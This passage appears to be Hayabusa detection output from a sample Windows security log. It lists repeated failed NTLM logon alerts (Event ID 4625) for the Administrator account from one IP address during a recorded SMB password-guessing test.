+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
